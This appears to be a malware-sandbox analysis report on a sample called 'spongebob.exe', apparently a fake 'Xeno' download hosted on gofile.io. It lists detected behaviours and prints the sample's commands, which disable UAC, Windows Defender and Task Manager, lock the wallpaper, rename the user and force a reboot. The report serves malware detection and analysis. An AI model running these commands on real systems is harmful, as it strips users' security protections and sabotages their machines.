Analysis

  • max time kernel
    39s
  • max time network
    41s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/05/2025, 15:14

Errors

Reason
Machine shutdown

General

  • Target

    https://gofile.io/d/ky2guY

Malware Config

Signatures

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/ky2guY
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2392
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffee412dcf8,0x7ffee412dd04,0x7ffee412dd10
      2⤵
      PID:100
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1900,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2120 /prefetch:3
      2⤵
      PID:608
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2084,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2080 /prefetch:2
      2⤵
      PID:4056
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2512 /prefetch:8
      2⤵
      PID:3972
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3176 /prefetch:1
      2⤵
      PID:3880
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3216 /prefetch:1
      2⤵
      PID:380
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4176,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4228 /prefetch:2
      2⤵
      PID:2396
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4588,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4716 /prefetch:1
      2⤵
      PID:4584
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4836,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3400 /prefetch:1
      2⤵
      PID:5716
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5392 /prefetch:8
      2⤵
      PID:1788
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5720,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5412 /prefetch:8
      2⤵
      PID:5636
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6068,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5936 /prefetch:8
      2⤵
      PID:2788
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4824 /prefetch:8
      2⤵
      PID:5000
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,10019929649345077921,2047756396236353127,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4820 /prefetch:8
      2⤵
      PID:4356
  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
    1⤵
    PID:1464
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
    1⤵
    PID:5944
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:2380
  • C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe
    "C:\Users\Admin\Downloads\Xeno.ext\xeno-main\Spongebob\spongebob.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    PID:380
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2CC.tmp\SpongebobFuck.cmd""
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2836
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        • System Location Discovery: System Language Discovery
        PID:5540
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5516
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5656
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5760
      • C:\Windows\SysWOW64\reg.exe
        Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • Modifies Windows Defender DisableAntiSpyware settings
        • System Location Discovery: System Language Discovery
        PID:5640
      • C:\Windows\SysWOW64\reg.exe
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1380
      • C:\Windows\SysWOW64\net.exe
        net user Admin /fullname:"SPONGEBOB WAS HERE!!!"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1504
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:5892
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown /r /t 00
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1236
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3978855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:2648
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
    1⤵
    PID:1008

Network

MITRE ATT&CK Enterprise v16

Downloads
